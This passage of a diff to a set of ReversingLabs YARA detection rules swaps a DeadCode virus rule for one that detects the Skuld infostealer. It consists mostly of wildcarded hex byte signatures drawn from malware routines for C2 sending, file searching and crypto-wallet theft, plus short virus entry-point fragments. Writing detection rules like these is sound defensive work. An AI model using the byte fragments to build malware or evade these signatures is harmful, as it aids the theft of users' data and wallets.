+            8B 4D ?? 0F B7 94 4D ?? ?? ?? ?? 85 D2 74 ?? 8B 45 ?? 8B 4D ?? 8A 94 4D ?? ?? ?? ??
+            88 54 05 ?? 8B 45 ?? 0F BE 4C 05 ?? 83 F9 ?? 75 ?? 8B 55 ?? C6 44 15 ?? ?? EB ?? 8D
+            45 ?? 50 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 0F
+            B6 15 ?? ?? ?? ?? 83 FA ?? 75 ?? C7 45 ?? ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? B8
+            ?? ?? ?? ?? C1 E0 ?? 8A 4D ?? 88 88 ?? ?? ?? ?? 0F B6 15 ?? ?? ?? ?? 83 FA ?? 75
+        }
+		$send_data_to_c2_p2 = {
+            C7 45 ?? ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 6B C8 ?? 8A 55 ?? 88
+            91 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 83 F8 ?? 75 ?? C7 45 ?? ?? ?? ?? ?? EB ?? C7 45
+            ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 6B D1 ?? 8A 45 ?? 88 82 ?? ?? ?? ?? B9 ?? ?? ?? ?? 6B
+            D1 ?? C6 82 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 6B C8 ?? 8A 15 ?? ?? ?? ?? 88 91 ?? ?? ??
+            ?? B8 ?? ?? ?? ?? 6B C8 ?? C6 81 ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 85 D2 74 ?? 6A ?? 8D
+            45 ?? 50 8B 4D ?? 51 BA ?? ?? ?? ?? D1 E2 8B 82 ?? ?? ?? ?? FF D0 83 F8 ?? 74 ?? 6A
+            ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 BA ?? ?? ?? ?? 6B C2 ?? 8B 88 ?? ?? ??
+            ?? FF D1 83 F8 ?? 74 ?? 6A ?? 8B 55 ?? 83 C2 ?? 52 8B 45 ?? 50 8B 4D ?? 51 BA ?? ??
+            ?? ?? 6B C2 ?? 8B 88 ?? ?? ?? ?? FF D1 83 F8 ?? 74 ?? EB ?? 68 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? 52 B8 ?? ?? ?? ?? C1 E0 ?? 8B 88 ?? ?? ?? ?? FF D1
+            BA ?? ?? ?? ?? 6B C2 ?? 8B 88 ?? ?? ?? ?? FF D1 B8 ?? ?? ?? ?? EB ?? 33 C0 8B E5 5D
+            C3
+        }
+		$find_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ??
+            ?? 52 A1 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? 6B D1 ?? 8B 82 ?? ?? ?? ?? FF D0 89 45 ?? 8B
+            0D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 D2 8B 0D ?? ?? ?? ?? 66 89 54 41 ?? 83
+            7D ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 15 ??
+            ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 66 89 45 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
+            83 C4 ?? 0F B7 4D ?? 8D 54 08 ?? 81 FA ?? ?? ?? ?? 72 ?? E9 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 8B 0D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83
+            C4 ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 74 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ??
+            ?? ?? 83 C4 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 74 ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 25 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? B9
+            ?? ?? ?? ?? 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ??
+            ?? ?? ?? 66 89 4D ?? 33 D2 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66
+        }
+		$find_files_p2 = {
+            89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? 33 C9 66 89 4D ?? BA
+            ?? ?? ?? ?? 66 89 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? B9 ?? ?? ?? ??
+            66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66
+            89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? 33 C0 66 89 45 ?? B9 ?? ?? ?? ?? 66 89 4D ?? BA
+            ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 89 4D ?? 33 D2
+            66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 89 4D ?? BA ?? ?? ?? ?? 66
+            89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? 33 C9 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8
+            ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? 33 C0
+            66 89 45 ?? B9 ?? ?? ?? ?? 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66
+            89 45 ?? 33 C9 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9
+            ?? ?? ?? ?? 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? 33 C0 66 89 45 ?? B9 ?? ?? ?? ??
+            66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66
+            89 4D ?? 33 D2 66 89 55 ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ??
+            85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85
+        }
+		$find_files_p3 = {
+            C0 0F 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ??
+            85 C0 75 ?? 8D 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D
+            4D ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 45 ?? 50 8D 8D
+            ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 55 ?? 52 8D 85 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 4D ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ??
+            83 C4 ?? 85 C0 74 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 89 4D ?? BA ?? ??
+            ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? 33 C9 66 89 4D ?? 0F B7 15 ?? ?? ?? ??
+            A1 ?? ?? ?? ?? 8D 0C 50 51 8D 55 ?? 52 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 8B 4D ?? 51 8B 15 ?? ?? ?? ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8A 0D ??
+            ?? ?? ?? 80 C1 ?? 88 0D ?? ?? ?? ?? 0F B7 55 ?? 33 C0 8B 0D ?? ?? ?? ?? 66 89 04 51
+            8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 B9 ?? ?? ?? ?? C1 E1 ?? 8B 91 ?? ?? ?? ?? FF D2 85
+            C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2
+        }
+		$find_crypto_wallets_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ??
+            ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ??
+            51 8B 55 ?? 52 B8 ?? ?? ?? ?? 6B C8 ?? 8B 91 ?? ?? ?? ?? FF D2 89 45 ?? 8B 45 ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 33 C9 8B 55 ?? 66 89 4C 42 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ??
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 66 89 45 ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ??
+            ?? ?? 83 C4 ?? 0F B7 55 ?? 8D 44 10 ?? 3D ?? ?? ?? ?? 72 ?? E9 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? 51 8B 55 ?? 52 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ??
+            ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? D1
+            E0 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 8D ?? ?? ?? ?? 83 E1
+            ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85
+            C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85
+            C0 0F 84 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 8D
+            ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ??
+            B9 ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 95 ?? ?? ?? ?? B8 ?? ?? ??
+            ?? 66 89 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? 33 C0
+            66 89 45 ?? 8D 4D ?? 51 6A ?? 8D 95 ?? ?? ?? ?? 52 0F B7 45 ?? 50 8B 4D ?? 51 8B 55
+            ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 86 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 95
+        }
+		$find_crypto_wallets_2 = {
+            0D ?? ?? ?? ?? 80 C1 ?? 88 0D ?? ?? ?? ?? 83 7D ?? ?? 76 ?? 8A 15 ?? ?? ?? ?? 80 C2
+            ?? 88 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ??
+            ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 25 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 3D ??
+            ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 8B 55 ?? 52 E8 ?? ??
+            ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 86 ?? ?? ?? ??
+            B8 ?? ?? ?? ?? C1 E0 ?? 8B 4D ?? 0F B6 14 01 83 FA ?? 0F 85 ?? ?? ?? ?? B8 ?? ?? ??
+            ?? 6B C8 ?? 8B 55 ?? 0F B6 04 0A 83 F8 ?? 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 6B D1 ??
+            8B 45 ?? 0F B6 0C 10 83 F9 ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 6B C2 ?? 8B 4D ?? 0F
+            B6 14 01 83 FA ?? 0F 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? B9 ?? ?? ??
+            ?? 66 89 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 95 ?? ?? ?? ??
+            B8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? BA
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $elerad_body at pe.entry_point )
+		uint16( 0 ) == 0x5A4D and ( all of ( $collect_os_information_p* ) ) and ( all of ( $send_data_to_c2_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $find_crypto_wallets_* ) )
 }
-
-rule REVERSINGLABS_Win32_Virus_Deadcode : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win64_Infostealer_Skuld : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects DeadCode virus."
+		description = "Yara rule that detects Skuld infostealer."
 		author = "ReversingLabs"
-		id = "89ec2e39-a163-5ba6-9b19-9c94b1923d47"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "2658fc6e-3f3f-5042-be05-cdcc3a29f133"
+		date = "2025-06-10"
+		modified = "2025-06-10"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/virus/Win32.Virus.DeadCode.yara#L3-L76"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6ac2e48daaed222f0a19afd4d03a02834705e0e3762db3217f68569554171846"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/infostealer/Win64.Infostealer.Skuld.yara#L1-L192"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a927a8bc74e2a6676825b208cd74f1be09cc3bc3aea7f7d54c5d016a330e77c2"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Virus"
-		tc_detection_name = "DeadCode"
+		tc_detection_type = "Infostealer"
+		tc_detection_name = "Skuld"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$deadcode_ep_1 = {
-            64 67 FF 36 30 00 58 8B 40 08 FF 70 48 5B FF 70 4C 5A 03 40 44
-            FF E0
+		$get_mac_address = {
+            4C 8D 64 24 ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 55 48 89 E5 48 81 EC ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 90 48 85 FF 75 ?? EB ?? 31 C0 31 DB 48 89 F9 48 89 F7 48 81 C4 ?? ?? ?? ??
+            5D C3 48 83 C0 ?? 48 FF CB 48 85 DB 0F 8E ?? ?? ?? ?? 0F 10 00 0F 11 44 24 ?? 0F 10
+            40 ?? 0F 11 44 24 ?? 0F 10 40 ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 40 ?? 0F 11 84 24 ??
+            ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 0F BA E2 ?? 90 73 ?? 48 83 BC 24 ?? ?? ?? ?? ?? 74
+            ?? 31 C9 EB ?? 48 89 5C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 31 DB
+            31 C9 E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 89 C1 48 8B 84 24 ?? ?? ?? ?? 83 F1 ?? EB ?? 31
+            C9 84 C9 0F 84 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 85 D2 74 ?? 48 89 54 24 ?? 48
+            8D 0C 52 48 8D 49 ?? 48 89 4C 24 ?? 48 8B B4 24 ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ??
+            48 8D 05 ?? ?? ?? ?? 31 DB E8 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 74 24 ?? 48
+            8B 7C 24 ?? 31 C9 31 DB EB ?? 31 C0 31 C9 EB ?? 48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? ??
+            31 C9 31 FF 48 89 FE 0F 1F 44 00 ?? E8 ?? ?? ?? ?? 48 89 C1 48 89 DF 31 C0 31 DB 48
+            81 C4 ?? ?? ?? ?? 5D C3 48 89 C3 31 FF 48 89 C8 31 C9 48 81 C4 ?? ?? ?? ?? 5D C3 44
+            88 44 03 ?? 48 FF C1
         }
-		$deadcode_marker = {
-            DE C0 AD DE
+		$find_files_p1 = {
+            4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 55 48 89 E5 48 81 EC ?? ?? ??
+            ?? 48 89 B4 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 9C
+            24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84
+            24 ?? ?? ?? ?? 48 C7 40 ?? ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 89 5C 24 ?? 31 C9 EB ?? 48 8B 84 24 ?? ?? ?? ?? 48 83 C0 ?? 48
+            8B 4C 24 ?? 48 FF C1 48 8B 5C 24 ?? 0F 1F 84 00 ?? ?? ?? ?? 48 39 CB 0F 8E ?? ?? ??
+            ?? 48 89 4C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 53 ?? 48 89 94 24 ?? ?? ?? ?? 4C 8B
+            00 4C 89 44 24 ?? 4C 8B 48 ?? 4C 89 8C 24 ?? ?? ?? ?? 48 39 D1 75 ?? 31 C0 48 8B 9C
+            24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 66 90 EB ?? 31 C0 48 8B 9C 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8D 3D ??
+            ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8B
+            4C 24 ?? 48 8B 51 ?? 48 8B 84 24 ?? ?? ?? ?? FF D2 48 8B 8C 24 ?? ?? ?? ?? 48 85 C9
+            48 8B 94 24 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 0F 45 D3 48 89 54 24 ?? 48 8B 9C 24 ?? ??
+            ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 0F 45 DF 48 89 9C 24 ?? ?? ?? ?? 84 C0 0F 84 ?? ??
+            ?? ?? 48 8B 4C 24 ?? 48 8B 51 ?? 48 8B 84 24 ?? ?? ?? ?? FF D2 48 89 84 24 ?? ?? ??
+            ?? 48 89 9C 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48
+            8B 84 24 ?? ?? ?? ?? 48 8B 5C 24 ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24
+            ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ??
+            48 8D 05 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? BF ?? ?? ?? ?? 48 8D B4 24
         }
-		$deadcode_ep_2 = {
-            2B C0 85 C0 74 0E 64 67 FF 36 00 00 64 67 89 26 00 00 89 00 E8
-            ED FF FF FF 8B 74 24 0C 64 67 A1 30 00 8B 40 08 8B 58 48 8B 50
-            4C 03 40 44 89 86 B8 00 00 00 89 86 B0 00 00 00 89 9E A4 00 00
-            00 89 96 A8 00 00 00 2B C0 C3
+		$find_files_p2 = {
+            41 B8 ?? ?? ?? ?? 4D 89 C1 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B
+            94 24 ?? ?? ?? ?? 48 39 D1 0F 85 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 49 ?? 48 8B 84 24
+            ?? ?? ?? ?? FF D1 44 0F 11 BC 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8B 8C 24
+            ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ??
+            48 89 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? BB ?? ?? ??
+            ?? 48 89 D9 E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 05 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ??
+            ?? ?? 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 89 C1 48 89 DF 48
+            8B B4 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 4D 89 C1 48 8B 84 24 ?? ?? ?? ?? 48 8B 5C 24
+            ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8B 11 90 66 90 48 85 D2 74 ?? 48 39 D1
+            74 ?? E9 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? 49 89 0B 48 8B 11 49
+            89 53 ?? 48 89 09 48 8B 51 ?? 4C 8B 41 ?? 4E 8D 0C 03 4C 8B 51 ?? 4C 39 CA 73 ?? 4C
+            89 84 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48 89 84 24 ?? ?? ?? ?? 4C 89 D0 48 89 D1 48 89
+            DF 48 8D 35 ?? ?? ?? ?? 4C 89 CB E8 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 49 89 C2 49
+            89 D9 48 89 CA 48 8B 84 24 ?? ?? ?? ?? 48 8B 5C 24 ?? 4C 89 94 24 ?? ?? ?? ?? 4C 89
         }
-		$deadcode_ep_3 = {
-            B8 DE C0 AD DE 50 5A 64 67 A1 30 00 8B 40 08 8B 58 48 8B 50 4C
-            03 40 44 FF D0
+		$find_files_p3 = {
+            8C 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 4B 8D 34 02 48 89 D9 48 89 C3 48 89 F0 E8
+            ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 89 56 ?? 48 8B 94 24
+            ?? ?? ?? ?? 48 89 56 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 48 8B 94 24 ?? ?? ?? ?? EB ?? E8
+            ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 49 89 13 4C 8B 46 ?? 4D 89 43 ?? 48 89 56 ?? E9
+            ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 49 ?? 48 8B 84 24 ?? ?? ?? ?? FF D1 44 0F 11 BC 24
+            ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ??
+            ?? 48 8B 94 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 84
+            24 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 89
+            84 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84 24 ??
+            ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? BE ??
+            ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 89 C1 48 89 DF 48 8B B4 24 ?? ?? ?? ?? 41 B8 ?? ??
+            ?? ?? 4D 89 C1 48 8B 84 24 ?? ?? ?? ?? 48 8B 5C 24 ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ??
+            ?? ?? ?? 48 8B 11 90 48 85 D2 74 ?? 48 39 D1 74 ?? E9 ?? ?? ?? ?? 83 3D ?? ?? ?? ??
+            ?? 74 ?? E8 ?? ?? ?? ?? 49 89 0B 48 8B 11 49 89 53 ?? 48 89 09 48 8B 51 ?? 4C 8B 41
+            ?? 4E 8D 0C 03 4C 8B 51 ?? 4C 39 CA 73 ?? 4C 89 84 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48
+            89 84 24 ?? ?? ?? ?? 4C 89 D0 48 89 D1 48 89 DF 48 8D 35 ?? ?? ?? ?? 4C 89 CB E8 ??
+            ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 49 89 C2 49 89 D9 48 89 CA 48 8B 84 24 ?? ?? ?? ??
+            48 8B 5C 24 ?? 4C 89 94 24 ?? ?? ?? ?? 4C 89 8C 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ??
+            ?? 4B 8D 34 02 48 89 D9 48 89 C3 48 89 F0 E8 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48
         }
-		$deadcode_body_1 = {
-            8B D0 8B EA 81 C5 ?? ?? ?? ?? 89 85 A4 00 00 00 89 9D C0 00 00 00 E8 56 01 00 00 89
-            45 00 8D 75 04 81 C2 ?? ?? ?? ?? 6A 19 FF 75 00 52 56 E8 CE 01 00 00 64 67 A1 30 00
-            8B 40 08 89 85 88 00 00 00 C7 85 D0 00 00 00 ?? ?? ?? ?? E8 09 00 00 00 8B 64 24 08
-            E9 03 01 00 00 33 D2 64 FF 32 64 89 22 83 BD C0 00 00 00 00 75 2F 6A 04 68 00 10 00
-            00 68 40 01 00 00 6A 00 FF 55 08 50 8F 45 78 E8 2A 03 00 00 68 00 40 00 00 68 40 01
-            00 00 FF 75 78 FF 55 28 E9 C3 00 00 00 8B 85 A4 00 00 00 05 ?? ?? ?? ?? 8D B5 B4 00
-            00 00 56 6A 00 55 50 68 00 00 10 00 6A 00 FF 55 30 89 85 AC 00 00 00 6A 04 68 00 10
-            00 00 6A 54 6A 00 FF 55 08 89 85 A8 00 00 00 64 67 A1 30 00 8B 40 10 8B 40 3C 8B B5
-            A8 00 00 00 8D 7E 10 56 57 6A 00 6A 00 6A 04 6A 01 6A 00 6A 00 50 6A 00 FF 55 50 85
-            C0 74 5D FF 76 04 8F 85 B0 00 00 00 64 67 A1 30 00 8B 40 08 8B D8 03 5B 3C 8B 5B 28
-            03 D8 8B 8D A4 00 00 00 81 ?? ?? ?? ?? 8D 85 B4 00 00 00 50 6A ?? 51 53 FF 36 FF 55
-            4C FF 76 04 FF 55 54 8D B5 AC 00 00 00 6A FF 6A 01 56 6A 02 FF 55 34 68 00 40 00 00
